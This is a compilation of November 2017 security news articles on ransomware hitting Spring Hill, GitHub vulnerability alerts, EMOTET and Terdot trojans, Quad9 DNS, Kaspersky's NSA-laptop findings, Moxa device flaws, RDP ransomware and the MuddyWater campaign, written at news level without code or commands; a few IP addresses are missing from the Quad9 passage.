In early November, the City of Spring Hill, Tenn, suffered a ransomware attack, but it still hasn’t recovered from attack attack.
In early November, the City of Spring Hill, Tenn, suffered a ransomware attack, but government officials refused to pay a $250,000 ransom demanded by the crooks and attempted to restore the database recovering the content from backups.

The malware caused serious damages to the city, many of the ordinary activities were affected, city workers were not able to access their email accounts, and residents were not able to make online payments or even use payment cards to pay utility bills or court fines, or conduct any other business transaction.

The situation is worse for emergency responders, the emergency dispatchers have had to log the calls, writing them by hand on a dry-erase board.

“This keeps track of our active police officers and medics out on a call,” said Director Brandi Smith about the white board.

“We write it down on paper, take the call number, put it behind them, so no matter who is working they know where the officer is, because despite all this, officer safety is still important to us,” she told News 2.

ransomware attack

According to WKRN, the ransomware attack has shut down all mobile data terminals in the city’s police cars.

City officials announced that 911 system and city emails have been restored since Tuesday, the situation is more complicated for restoring direct deposits and online payments.

Investigators believe that the crooks haven’t stolen information from the city’s server.

GitHub warns developers when their projects include vulnerable libraries
18.11.2017 securityaffairs

The code hosting service GitHub warns developers when including certain flawed software libraries in their projects and suggest fixes to solve the issues.
The code hosting service warns developers when including certain flawed software libraries in their projects and provides advice on how to address the issue.

GitHub has recently introduced the Dependency Graph, a feature that lists all the libraries used by a project. The new feature supports JavaScript and Ruby, and the company also plans to add the support for Python next year.


The new security feature is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The availability of a dependency graph allows to notify the owners of the projects when it detects a Known security vulnerability in one of the dependencies and suggest known fixes from the GitHub community.

“Today, for the over 75 percent of GitHub projects that have dependencies, we’re helping you do more than see those important projects. With your dependency graph enabled, we’ll now notify you when we detect a vulnerability in one of your dependencies and suggest known fixes from the GitHub community.” states GitHub on the introduction of the security alerts.

GitHub provides developers the type of flaw, the associated severity, and affected versions, the user interface includes a link that points to a page where additional details are available.

Administrators can also choose the form of warnings, including email alerts, web notifications, and warnings via the user interface, selecting also the final recipient of the message (individuals or groups).

The code hosting service relies on both Ruby gems and NPM packages on MITRE’s Common Vulnerabilities and Exposures (CVE) list in order to determine if a project is using flawed libraries.

“Vulnerabilities that have CVE IDs (publicly disclosed vulnerabilities from the National Vulnerability Database) will be included in security alerts. However, not all vulnerabilities have CVE IDs—even many publicly disclosed vulnerabilities don’t have them.” continues GitHub.

“This is the next step in using the world’s largest collection of open source data to help you keep code safer and do your best work. The dependency graph and security alerts currently support Javascript and Ruby—with Python support coming in 2018.”

Since many publicly disclosed vulnerabilities don’t have CVEs, GitHub will also try to warn users of flaws that still haven’t received the code.

“We’ll continue to get better at identifying vulnerabilities as our security data grows,” GitHub added.

In the presence of a security patch for a vulnerability discovered by GitHub, the service advises the developers to update or adopt a fix provided by the community.

EMOTET Trojan Variant Evades Malware Analysis
18.11.2017 securityweek
A recently observed variant of the EMOTET banking Trojan features new routines that allow it to evade sandbox and malware analysis, Trend Micro security researchers say.

Also known as Geodo, EMOTET is a piece of malware related to the Dridex and Feodo (Cridex, Bugat) families. Mainly used to steal banking credentials and other sensitive information, EMOTET can also be used as a Trojan downloader, and recent attacks have dropped various malicious payloads.

In a report published in early November, Microsoft revealed that EMOTET has been increasingly targeting business users.

According to Trend Micro, EMOTET’s dropper changed from using RunPE to exploiting a Windows application programming interface (API) called CreateTimerQueueTimer. The API creates a queue for lightweight objects called timers, which are meant to enable the selection of a callback function at a specified time.

“The original function of the API is to be part of the process chain by creating a timer routine, but here, the callback function of the API becomes EMOTET’s actual payload. EMOTET seems to have traded RunPE for a Windows API because the exploitation of the former has become popular while the latter is lesser known, theoretically making it more difficult to detect by security scanners,” Trend Micro explains.

EMOTET, however, is not the first malware family to abuse this Windows API, as the Hancitor banking Trojan that also dropped PONY and VAWTRAK used it in its dropper (a malicious macro document) as well.

The new Trojan variant also features an anti-analysis technique that involves checking when the scanner monitors activities in order to dodge detection. With the use of said Windows API, the malware can do the job every 0x3E8 milliseconds, the security researchers say.

At the second stage of the payload, the new Trojan variant can check if it runs inside a sandbox environment and terminates its process if it does. The dropper checks the NetBIOS’ name, the UserName, and for the presence of specific files on the system.

The malware also runs itself through another process if it does not have admin privilege. If it does have said privileges, it creates an auto start service for persistence, renames it and starts it, collects system information, encrypts it, and sends it via a POST request to the command and control (C&C) server.

In a recent analysis of the EMOTET C&C infrastructure, security researcher MalwareTech (Marcus Hutchins) notes that the threat is using hardcoded IP addresses to connect to the server. However, it uses compromised sites as proxies for the C&C connection.

This practice, the researcher says, has become increasingly popular “because it adds a layer of protection preventing researchers from easily finding and shutting down the actual C2 server.” It also makes it difficult to flag the servers as malicious, given that they are legitimate websites that have been running for years.

The new EMOTET variant is distributed via phishing emails containing a malicious URL meant to drop a macro-enabled document. Best practices for defending against phishing attacks should keep both enterprises and end-users safe from the threat, Trend Micro notes.

GitHub Warns Developers When Using Vulnerable Libraries
18.11.2017 securityweek
Code hosting service GitHub now warns developers if certain software libraries used by their projects contain any known vulnerabilities and provides advice on how to address the issue.

GitHub recently introduced the Dependency Graph, a feature in the Insights section that lists the libraries used by a project. The feature currently supports JavaScript and Ruby, and the company plans on adding support for Python next year.

The new security feature added by GitHub is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

When a vulnerable library is detected, a “Known security vulnerability” alert will be displayed next to it in the Dependency graph. Administrators can also configure email alerts, web notifications, and warnings via the user interface, and they can add the teams or individuals who should see the alerts.

GitHub identifies vulnerable projects by tracking flaws in Ruby gems and NPM packages on MITRE’s Common Vulnerabilities and Exposures (CVE) list. When a new flaw is added, the company identifies all repositories that use the affected version and informs their owners.

The information provided to administrators includes the type of flaw, its severity, and affected versions. There is also a link that points to a page where additional details are available.

If a patch exists for the vulnerability, GitHub advises developers to update or uses machine learning to suggest a fix provided by the community.

GitHub currently tracks vulnerabilities that have been assigned a CVE identifier, but since many publicly disclosed flaws don’t have CVEs, the company will also try to warn users of issues that don’t have one. “We'll continue to get better at identifying vulnerabilities as our security data grows,” GitHub said.

Group Launches Secure DNS Service Powered by IBM Threat Intelligence
18.11.2017 securityweek Safety
A newly announced free Domain Name System (DNS) service promises automated immunity from known Internet threats by blocking access to websites flagged as malicious.

Called Quad9, because the IP address of the primary DNS server being, the new service was launched by IBM Security, Packet Clearing House (PCH) and The Global Cyber Alliance (GCA) and is aimed to provide increased security and privacy online to consumer and businesses alike.

The Quad9 service was designed to keep users safe from millions of malicious Internet sites that have been already flagged for stealing personal information, infecting users with ransomware and other type of malware, or for conducting fraudulent activity.

The service routes users’ DNS queries through a secure network of servers and uses threat intelligence from over a dozen cyber security companies to provide real-time perspective on whether the websites are safe or not. The users’ browsers are automatically blocked from accessing a website that the system has detected as being infected.

Quad9 harvests intelligence from IBM X-Force’s threat database and also taps feeds from 18 additional partners, including Abuse.ch, the Anti-Phishing Working Group, Bambenek Consulting, F-Secure, mnemonic, 360Netlab, Hybrid Analysis GmbH, Proofpoint, RiskIQ, and ThreatSTOP.

The service was designed to protect traditional PCs and laptops, along with Internet connected TVs, DVRs, and Internet of Things (IoT) products such as smart thermostats and connected home appliances. Many of these devices do not receive important security updates and are difficult to secure although they remain connected to the Internet, which leaves them vulnerable to hackers.

Performance should not be affected when using the new DNS service, IBM says. At launch, Quad9 has points of presence in over 70 locations across 40 countries, leveraging PCH’s expertise and global assets. The service’s points of presence should double over the next 18 months, in an attempt to improve speed, performance, privacy, and security.

Quad9 says it does not store, correlate or otherwise leverage personally identifiable information (PII) from its users. To take advantage of the new DNS service’s benefits, users only need to set their devices to use as their DNS server.

“Setting up DNS filtering requires just a simple configuration change. Most organizations or home users can update in minutes by changing the DNS settings in the central DHCP server which will update all clients in a few minutes with no action needed at end devices at all. The service is and will remain freely available to anyone wishing to use it,” Quad9’s website reads.

Quad9 started as the brainchild of GCA, but each of the involved partners is responsible for a different aspect of the service. GCA offers system development capabilities, PCH is responsible for Quad9’s network infrastructure, while IBM provides X-Force threat intelligence and the service’s IP address

Other services providing similar (free) offerings include Cisco-owned OpenDNS, and Google’s Public DNS (which uses and as its DNS server IPs).

“Protecting against attacks by blocking them through DNS has been available for a long time, but has not been used widely. Sophisticated corporations can subscribe to dozens of threat feeds and block them through DNS, or pay a commercial provider for the service. However, small to medium-sized businesses and consumers have been left behind – they lack the resources, are not aware of what can be done with DNS, or are concerned about exposing their privacy and confidential information,” said Philip Reitinger, President and CEO of the Global Cyber Alliance.

While the service looks promising, it remains to be seen how it will perform when compared to already established offerings, Lenny Zeltser, Vice President of Products at Minerva Labs, an Israel-based provider of endpoint security solutions, told SecurityWeek in an emailed comment.

“Based on the iniquitous DNS protocol, Quad9 promises to secure network activities in a non-intrusive manner and in a manner that’s easy to deploy. That’s wonderful. Though I’m encouraged by these aspects of the offering, I am curious how it compares to the well-established Cisco Umbrella (formerly OpenDNS) service, which has been around for a while and earned trust among end-users and IT practitioners. Similarly, Google DNS servers provide some network security benefits to their users,” Zeltser said.

Joseph Carson, chief security scientist at Thycotic, a Washington D.C. based provider of privileged account management (PAM) solutions, told SecurityWeek that the new service’s focus on privacy is more than welcomed. Privacy as we know it is disappearing fast, with everyone being watched and monitored 24/7 when in public places, in an attempt to improve security and deliver tailored experiences, he says.

“The new DNS service from Quad9, with a focus on both privacy and security, is a step in the right direction. It is a must needed level of protection in today’s world of cyber threats and helps put the balance back in the consumers. While many governments and ISP’s are removing the ability for citizens to surf the internet with privacy and confidence in security, Quad9 has stepped in to bring a bit of balance back. It will help bring some peace of mind to many who want to surf the internet without being continuously targeted and limit personal information flowing through the internet without their knowledge,” Carson said.

“It is also important to note that what Quad9 is providing is not 100% security. Therefore, you must continue to be cautious when using the internet and always question any suspicious links or advertisements displayed. This will not stop you from getting phishing emails or social media threats so it is always important to take additional steps. Continue to do best practices when purchasing anything online and manage your credentials and passwords securely,” he concluded.

Banking Trojan Gains Ability to Steal Facebook, Twitter and Gmail Accounts
17.11.2017 thehackernews

Security researchers have discovered a new, sophisticated form of malware based on the notorious Zeus banking Trojan that steals more than just bank account details.
Dubbed Terdot, the banking Trojan has been around since mid-2016 and was initially designed to operate as a proxy to conduct man-in-the-middle (MitM) attacks, steal browsing information such as stored credit card information and login credentials and injecting HTML code into visited web pages.
However, researchers at security firm Bitdefender have discovered that the banking Trojan has now been revamped with new espionage capabilities such as leveraging open-source tools for spoofing SSL certificates in order to gain access to social media and email accounts and even post on behalf of the infected user.
Terdot banking trojan does this by using a highly customized man-in-the-middle (MITM) proxy that allows the malware to intercept any traffic on an infected computer.
Besides this, the new variant of Terdot has even added automatic update capabilities that allow the malware to download and execute files as requested by its operator.
Usually, Terdot targeted banking websites of numerous Canadian institutions such as Royal Bank, Banque Nationale, PCFinancial, Desjardins, BMO (Bank of Montreal) and Scotiabank among others.
This Trojan Can Steal Your Facebook, Twitter and Gmail accounts
However, according to the latest analysis, Terdot can target social media networks including Facebook, Twitter, Google Plus, and YouTube, and email service providers including Google's Gmail, Microsoft's live.com, and Yahoo Mail.
Interestingly, the malware avoids gathering data related to Russian largest social media platform VKontakte (vk.com), Bitdefender noted. This suggests Eastern European actors may be behind the new variant.
The banking Trojan is mostly being distributed through websites compromised with the SunDown Exploit Kit, but researchers also observed it arriving in a malicious email with a fake PDF icon button.
If clicked, it executes obfuscated JavaScript code that downloads and runs the malware file. In order to evade detection, the Trojan uses a complex chain of droppers, injections, and downloaders that allow the download of Terdot in pieces.
Once infected, the Trojan injects itself into the browser process to direct connections to its own Web proxy, read traffic and inject spyware. It can also steal authentication info by inspecting the victim's requests or injecting spyware Javascript code in the responses.
Terdot can also bypass restrictions imposed by TLS (Transport Layer Security) by generating its own Certificate Authority (CA) and generating certificates for every domain the victim visits.
Any data that victims send to a bank or social media account could then be intercepted and modified by Terdot in real-time, which could also allow it to spread itself by posting fake links to other social media accounts.
"Terdot is a complex malware, building upon the legacy of Zeus," Bitdefender concluded. "Its focus on harvesting credentials for other services such as social networks and email services could turn it into an extremely powerful cyber espionage tool that is extremely difficult to spot and clean."
Bitdefender has been tracking the new variant of Terdot banking Trojan ever since it resurfaced in October last year. For more details on the new threat, you can head on to a technical paper (PDF) published by the security firm.

Kaspersky: NSA Worker's Computer Was Already Infected With Malware

17.11.2017 thehackernews BigBrothers

Refuting allegations that its anti-virus product helped Russian spies steal classified files from an NSA employee's laptop, Kaspersky Lab has released more findings that suggest the computer in question may have been infected with malware.
Moscow-based cyber security firm Kaspersky Lab on Thursday published the results of its own internal investigation claiming the NSA worker who took classified documents home had a personal home computer overwhelmed with malware.
According to the latest Kaspersky report, the telemetry data its antivirus collected from the NSA staffer's home computer contained large amounts of malware files which acted as a backdoor to the PC.
The report also provided more details about the malicious backdoor that infected the NSA worker's computer when he installed a pirated version of Microsoft Office 2013 .ISO containing the Mokes backdoor, also known as Smoke Loader.
Backdoor On NSA Worker's PC May Have Helped Other Hackers Steal Classified Documents
This backdoor could have allowed other hackers to steal classified documents and hacking tools belonging to the NSA from the machine of the employee, who worked for the Tailored Access Operations (TAO) group of hackers at the agency.
For those unaware, United States has banned Kaspersky antivirus software from all of its government computers over suspicion of Kaspersky's involvement with the Russian intelligence agency and spying fears.
Though there's no substantial evidence yet available, an article published by US news agency WSJ last month claimed that Kaspersky Antivirus helped Russian government hackers steal highly classified documents and hacking tools belonging to the NSA in 2015 from a staffer's home PC.
However, the article, which quoted multiple anonymous sources, failed to provide any solid evidence to prove if Kaspersky was intentionally involved with the Russian spies or some hackers simply exploited some zero-day bug in the Antivirus product.
Kaspersky lives up to its claims that its antivirus software detected and collected the NSA classified files as part of its normal functionality, and has rigorously denied allegations it passed those documents onto the Russian government.
Now, in the recent report published by the anti-virus firm said between September 11, 2014, and November 17, 2014, Kaspersky Lab servers received confidential NSA materials multiple times from a poorly secured computer located in the United States.
The company's antivirus software, which was installed on the employee's PC, discovered that the files contained malware used by Equation Group, a 14-year-old NSA's elite hacking group that was exposed by Kaspersky in 2015.
Kaspersky Claims it Deleted All NSA Classified Files
Besides confidential material, the software also collected 121 separate malware samples (including a backdoor) which were not related to the Equation Group.
The report also insists that the company deleted all classified documents once one of its analysts realized that the antivirus had collected more than malicious binaries. Also, the company then created a special software tweak, preventing those files from being downloaded again.
"The reason we deleted those files and will delete similar ones in the future is two-fold; we do not need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials," Kaspersky Lab report reads.
"Assuming that the markings were real, such information cannot and will not [be] consumed even to produce detection signatures based on descriptions."
Trojan Discovered on NSA Worker's Computer
The backdoor discovered on the NSA staffer's PC was actually a Trojan, which was later identified as "Smoke Bot" or "Smoke Loader" and allegedly created by a Russian criminal hacker in 2011. It had also been advertised on Russian underground forums.
Interestingly, this Trojan communicated with the command and control servers apparently set up by a Chinese individual going by the name "Zhou Lou," using the e-mail address "zhoulu823@gmail.com."
Since executing the malware would not have been possible with the Kaspersky antivirus enabled, the staffer must have disabled the antivirus software to do so.
"Given that system owner's potential clearance level, the user could have been a prime target of nation states," the Kaspersky report reads.
"Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands."
More details on the backdoor can be found here.
For now, the Kaspersky anti-virus software has been banned by the U.S. Department of Homeland Security (DHS) from all of its government computers.
In the wake of this incident, Kaspersky Lab has recently launched a new transparency initiative that involves giving partners access to its antivirus source code and paying large bug bounties for security issues discovered in its products.

New Cyber Insurance Firm Unites Insurance With Cyber Intelligence
17.11.2017 securityweek Cyber
Mountain View, Calif-based cyber insurance firm At-Bay has emerged from stealth with a mission to shake up the status quo in cyber insurance. It brings a new model of security cooperation between insured and insurer to reduce risk and exposure to both parties.

At-Bay has partnered with HSB to bring to market a product to insure and defend organizations against cyber risks. It has closed a $6 million seed funding round, led by LightSpeed Venture Partners, with the participation of Shlomo Kramer and LocalGlobe.

"We founded At-Bay with the belief that controlling for cyber risk enables businesses to embrace technology and unlock great value to customers," said Rotem Iram, CEO and founder, At-Bay. "We match deep insights on a company's IT security with financial exposure that cyber attack vectors create, to enable insurance brokers and risk managers to more clearly and accurately assess and manage cyber risk. Our insurance products and supporting risk management services provide organizations with the confidence that they can take on the challenges of tomorrow."

Organizations are increasingly digitizing their businesses and becoming more reliant on technology. Technology is not secure and presents risk. Much of that risk is mitigated by security technology -- but each day there is further proof that security technology is not perfect. Risk managers need to consider that despite all the security technology employed to mitigate risk, there will always be residual risk that is best handled by risk transfer; that is, cyber insurance. Cyber insurance can be seen as a complement to cybersecurity technology used together to more fully mitigate the increasing risk of insecure digitization.

The primary problem for cyber insurers is that there is no established historical corpus of understanding for cybersecurity risk in the same way as there is for, say, motor or life insurance. Insurance works best with static risk, but cyber risk is intrinsically dynamic -- both the target (the IT infrastructure) and the attack methodology (attackers, tools, techniques, exploits and motivation) are continuously changing. Neither the insurer nor the insured currently understands how cybersecurity can be insured. For example, a survey by At-bay indicates that 50% of companies that do not have cyber insurance say it is because they do not know enough about cyber insurance.

At-bay proposes to solve this dilemma by uniting cybersecurity understanding with cyber insurance delivery within one supplier. At-bay's Rotem Iram points out that insurers have two advantages in this process. Firstly they are on the hook to pay out in case of loss; and secondly, as they develop their customer base, they become privy to a vast amount of information on cybersecurity and risk. The first provides the incentive for insurers to learn from the second, provided they have sufficient in-house understanding of cybersecurity threats, mitigations and response.

One of the problems for insurers is that each client's risk profile is continuously and unpredictably changing. "A rate could be set for a perceived risk; but two months later the NSA loses EternalBlue and the risk level changes," explains Iram. "The insurer cannot increase the premiums because its not the insured's fault -- so he has to carry that increased risk at the same premium for another ten months. But if the insurer has sufficient understanding of the security posture of the client, he can tell the client about the new risk and how to mitigate it."

The interesting part about this example is that Iram would still pay out on the insurance even if he warned a company about a new risk and the company did nothing about it -- and was subsequently affected. "Yes, 100%," he told SecurityWeek. He accepts that he may be being a little naive, but firmly believes the future for cyber insurance is the evolution of a mutually collaborative relationship between insurer and insured. If the insurer gives good advice, and the insured responds, the insurer could give an end-of-year rebate.

Key to that collaboration is that the insured must trust the cybersecurity knowledge of the cybersecurity insurer. This is what has been lacking and is precisely what At-Bay seeks to bring to the table. Iram himself comes from a security background, and even spent five years with the Israel Defence Forces where he became head of the techno-intelligence group. He believes that if the insurer can demonstrate that it gives good advice, the insured will respond. "Nobody wants to get hacked. There's always a cost. There will always be some aspects that aren't or cannot be covered by insurance." Insurance is about reducing financial exposure as far as possible, not about eliminating it -- it cannot, for example, insure against loss of revenue caused by brand reputation damage (think Target), or loss of share value (think Equifax).

"We will be collecting data and using researchers to push the limits of our understanding of risk," he told SecurityWeek. "As we do that, we will be improving the quality of our product. Product quality is depressed today because insurance companies do not really understand the cybersecurity risk.

"Our team," he continued, "is split between Mountain View and Tel Aviv. Tel Aviv is where we have access to incredible security talent from the intelligence community. What we've built is a nation-state level reconnaissance capability based on what we've brought from the intelligence community. Our team and machine gathers intelligence from different sources, contextualizes it, and relates it to the customer infrastructure. Long story short, we scan the entire market of publicly available resources every month. Whenever we underwrite a company we have a history of how their technology stack and their security stack has looked and evolved over a period of time. This is a good part of the underwriting process, and helps us offer really good security advice to our clients."

The Equifax breach is an example of how this model would work. Rather than sit back and wait for the breach that would trigger an insurance claim, At-Bay would detect and inform any client with an unpatched vulnerability (such as the Struts vulnerability at Equifax) and explain how it should be remediated.

If At-Bay succeeds in its model of uniting security intelligence with insurance, it could shake up the entire cyber insurance market. If it does that, then both cybersecurity vendors and technology companies will need to look at their existing own third-party liability insurance. If more companies adopt cyber insurance, then more cybersecurity insurers will start trying to claw back their payouts from third parties who may be deemed to have been at fault in the breach.

Moxa NPort Devices Vulnerable to Remote Attacks
17.11.2017 securityweek
Hundreds of Moxa Devices Similar to Ones Targeted in Ukraine Power Grid Hack Vulnerable to Remote Attacks

Firmware updates released by Moxa for some of its NPort serial device servers patch several high severity vulnerabilities that can be exploited remotely. These types of devices were targeted in the 2015 attack on Ukraine’s energy sector.

According to an advisory published by ICS-CERT, the flaws affect NPort 5110 versions 2.2, 2.4, 2.6 and 2.7, NPort 5130 version 3.7 and prior, and NPort 5150 version 3.7 and prior. The security holes have been patched with the release of version 2.9 for NPort 5110 and version 3.8 for NPort 5130 and 5150.

ICS-CERT said one of the vulnerabilities, CVE-2017-16719, allows an attacker to inject packets and disrupt the availability of the device. Another flaw, CVE-2017-16715, is related to the handling of Ethernet frame padding and it could lead to information disclosure, while the last issue, CVE-2017-14028, can be leveraged to cause memory exhaustion by sending a large amount of TCP SYN packets.Moxa NPort devices vulnerable to remote attacks

Florian Adamsky, the researcher credited by ICS-CERT for finding the flaws, told SecurityWeek that the vulnerabilities were found as part of a bigger research project conducted by him and Dr. Thomas Engel of the University of Luxembourg’s SECAN-Lab.

The research focuses on industrial Serial-to-Ethernet converters, which are often used in critical infrastructure, including power plants, water treatment facilities, and chemical plants. Adamsky pointed out that in the 2015 attack on Ukraine’s power grid, which caused significant blackouts, the hackers targeted these types of devices in an effort to make them inoperable. A detailed research paper describing the vulnerabilities will be published at some point in the future.

The researcher said all of the Moxa device vulnerabilities can be exploited remotely over the Internet. A scan with the Censys search engine revealed more than 2,000 Moxa devices connected to the Web, including over 1,350 NPort systems affected by the discovered flaws.

Moxa NPort devices vulnerable to remote attacks

Adamsky said the CVE-2017-16719 vulnerability exists due to the fact that the TCP Initial Sequence Number (ISN) from NPort 5110 and 5130 devices is predictable. This allows an attacker to create and inject malicious network packets into an established TCP connection by predicting the ISN.

According to the researcher, the ISN was based on uptime, which can be easily obtained via the Simple Network Management Protocol (SNMP). Exploitation of this vulnerability could, in certain circumstances, lead to arbitrary command execution, the expert said.

Exploiting CVE-2017-16715 can allow an attacker to obtain previously sent network packets, which can include the session ID of an HTTP connection. This ID can be leveraged by an attacker to gain access to a device’s web interface.

“In CVE-2017-16715, we found out that these devices were using uninitialized memory as padding for network packets,” Adamsky explained. “According to RFC 894, the minimum Ethernet frame size is 46 bytes. If a packet is smaller than the minimum size, the IP packet ‘should be padded (with octet of zero) to meet the Ethernet minimum frame size’. Instead of octets of zeros, Moxa used uninitialized memory. This vulnerability was called Etherleak in the past.”

The security holes were reported to Moxa via ICS-CERT in June and August, and they were patched by the vendor on November 14.

Ransomware Targets SMBs via RDP Attacks
17.11.2017 securityweek
A series of ransomware attacks against small-to-medium companies are leveraging Remote Desktop Protocol (RDP) access to infect systems, Sophos reports.

As part of these attacks, the mallicious actors abuse a commonly found issue in many business networks: weak passwords. After managing to crack and RDP password, attackers can easily install their malware onto the company’s systems with hopes to collect a ransom payment.

Discovering RDP ports exposed to the Internet isn’t difficult at all, Sophos explains. Cybercriminals can use specialized search engines such as Shodan for that and then abuse public or private tools to gain access to the discovered systems.

As part of the analyzed attacks, the actors used a tool called NLBrute to brute-force their way into the found systems by trying a variety of RDP passwords. Once they managed to find the right password, the attackers would immediately log into the network and create their own administrative accounts, Sophos says.

By doing so attackers can reconnect to the network even if the admin password they used for initial compromise has been changed. “They’ve already got backup accounts they can use to sneak back in later,” the researchers say.

Next, the attackers download and install low-level system tweaking software, such as Process Hacker, after which they turn off or reconfigure anti-malware applications. They also attempt to elevate privileges through abusing known vulnerabilities, including the CVE-2017-0213 and CVE-2016-0099 flaws that have been long patched by Microsoft.

The attackers also turn off database services to allow their malware to target databases, and also turn off the Windows live backup service called Volume Shadow Copy and delete existing backups, to prevent victims from restoring targeted files without paying. Next, they upload and run their ransomware.

According to Sophos, the attackers demanded a 1 Bitcoin ransom from their victims. Although numerous companies were hit, the attackers’ Bitcoin wallet shows a single transaction matching the demanded amount. Either victims have not paid, or they managed to negotiate lower payments, the security researchers say.

“The victims of this kind of attack are almost always small-to-medium companies: the largest business in our investigation had 120 staff, but most had 30 or fewer,” Sophos says.

To stay protected, organizations are advised to turn off RDP, or to protect it well if they need to use it regularly. They should also consider using a Virtual Private Network (VPN) for connections from outside their network, along with two-factor authentication (2FA), as well as to install available patches fast, to ensure their systems remain protected.

“You've probably heard the saying that 'if you want a job done properly, do it yourself’. Sadly, there's a niche of cybercrooks who have taken that advice to heart: if you've been sloppy setting up remote access to your network, they log in themselves and infect you with ransomware by simply running it directly, just like you or I might load Word or Notepad. This means the cyber criminals don’t need to mess around with emails, social engineering or malicious attachments,” said Paul Ducklin, Senior Technologist, Sophos.

The use of RDP to spread ransomware, however, isn’t a new practice. In fact, this attack method was so popular in the beginning of this year that it even topped email for ransomware distribution.

Last month, a BTCware ransomware variant called Payday was observed abusing the same method for infection. Security researchers investigating the attacks discovered that the malware operators were using brute-force attacks to crack RDP passwords and compromise the poorly secured systems.

Who is behind MuddyWater in the Middle East? Likely a politically-motivated actor
17.11.2017 securityaffairs BigBrothers

Researchers are investigating a mysterious wave of attacks in the Middle East that was dubbed MuddyWater due to the confusion in attributing the.
Security experts at Palo Alto Networks are monitoring long-lasting targeted attacks aimed at entities in the Middle East and that are difficult to attribute.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

Threat actors used PowerShell-based first stage backdoor named POWERSTATS, across the time the hackers changed tools and techniques.

“This blog discusses targeted attacks against the Middle East taking place between February and October 2017 by a group Unit 42 is naming MuddyWater” states the analysis from PaloAlto Networks.

“MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.”

MuddyWater attackers used a set of weaponized documents that were also used in recently observed incidents targeting the Saudi Arabian government. The same set of documents is similar to ones associated with a series of attacks discovered by experts at Morphisec.

The malicious documents associated with this last wave of attacks had been tailored according to the target regions.

Some of the attacks were attributed to the FIN7 that launched a campaign aimed at employees involved in SEC Filings.

Palo Alto Networks believe that the recent wave of attacks might have been mistakenly associated with the FIN7 group, it also reported that a C&C server delivering the FIN7-linked DNSMessenger tool was in MuddyWater attacks as well.

The hackers maintained the same final payload while changing delivery methods between attacks.

“Based on these connections we can be confident that all the files and infrastructure […] are related, since more than one of these can be used to link each of the samples discussed in each case,” Palo Alto notes.

The hackers used well known tools, including Meterpreter, Mimikatz, Lazagne, Invoke-Obfuscation, and more.

In some recent attacks, the threat actor used GitHub to host the POWERSTATS backdoor.

“In some of their recent attack documents, the attackers also used GitHub as a hosting site for their custom backdoor, POWERSTATS.” continues the analysis.

The experts managed a number of GitHub repositories related to their malware.

The experts observed compromised accounts at third party organizations sending the MuddyWater malware, in one case, the attackers sent a malicious document which appears nearly identical to a legitimate attachment which PaloAlto observed later being sent to the same recipient.

“This indicates that the attackers stole and modified a legitimate document from the compromised user account, crafted a malicious decoy Word macro document using this stolen document and sent it to the target recipient who might be expecting the email from the original account user before the real sender had time to send it,” reported PaloAlto.


According to Palo Alto Networks, past attribution of the attacks were wrong, the group in not financially motivated as previously thought, instead it politically motivated.

Threat actors might have planted a false flag to make hard the attribution.

“Whilst we could conclude with confidence that the attacks discussed in this article are not FIN7 related, we were not able to answer many of our questions about the MuddyWater attacks. We are currently unable to make a firm conclusion about the origin of the attackers, or the specific types of information they seek out once on a network,” the security researchers concluded.

Kaspersky provided further details on NSA Incident. Other APTs targeted the same PC
17.11.2017 securityaffairs BigBrothers

Kaspersky Lab publishes a full technical report related to hack of its antivirus software to steal NSA hacking code.
In October, anonymous source claimed that in 2015 the Russian intelligence stole NSA cyber weapons from the PC of one of its employees that was running the Kaspersky antivirus.

Kaspersky denies any direct involvement and provided further details about the hack, but it wasn’t a good period for the firm.

In September, the US Government banned the Russian security firm from all federal government systems.

The PC was hacked after the NSA employee installed a backdoored key generator for a pirated copy of Microsoft Office.

Kaspersky Lab, published in October a detailed report on the case that explains how cyber spies could have easily stolen the software exploits from the NSA employee’s Windows PC.

In October many media accused Kaspersky of helping the Russian intelligence for the detection of the US cyber-weapons on the PC via its security solutions, but according to the security firm the situation is quite different.

According to the telemetry logs collected by the Russian firm, the staffer temporary switched off the antivirus protection on the PC, and infected his personal computer with a spyware from a product key generator while trying to use a pirated copy of Office.

On September 11, 2014, Kaspersky antivirus detected the Win32.GrayFish.gen trojan on the NSA employee’s PC, some time later the employee disabled the Kaspersky software to execute the activation-key generator

Then the antivirus was reactivated on October 4, it removed the backdoored key-gen tool from the NSA employee’s PC and uploaded it to Kaspersky’s cloud for further analysis.

Kaspersky offered to hand over the source code of its solution to the US experts, to prove it wasn’t up involved in any cyber espionage operation.

Back to the present, Kaspersky published a new report that sheds the light on the investigation conducted by the firm on the NSA-linked Equation Group APT.

Kaspersky began running searches in its databases since June 2014, 6 months prior to the year the alleged hack of its antivirus, for all alerts triggered containing wildcards such as “HEUR:Trojan.Win32.Equestre.*”. The experts found a few test signatures in place that produced a LARGE amount of false positives.

The analysis revealed the presence of a specific signature that fired a large number of times in a short time span on just one system, specifically the signature “HEUR:Trojan.Win32.Equestre.m” and a 7zip archive (referred below as “[undisclosed].7z”). This is the beginning of the analysis on the system that was found containing not only this archive, but many files both common and unknown that indicated this was probably a person related to the malware development.

“In total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users’ privacy.” states the new report published by Kaspersky.

“This was a hard decision, but should we make an exception once, even for the sake of protecting our own company’s reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.”


The analysis of the computer there the archive was found revealed that it was already infected with malware. In October of that year the user downloaded a pirated copy of the Microsoft Office 2013, but the .ISO was containing the Mokes backdoor.

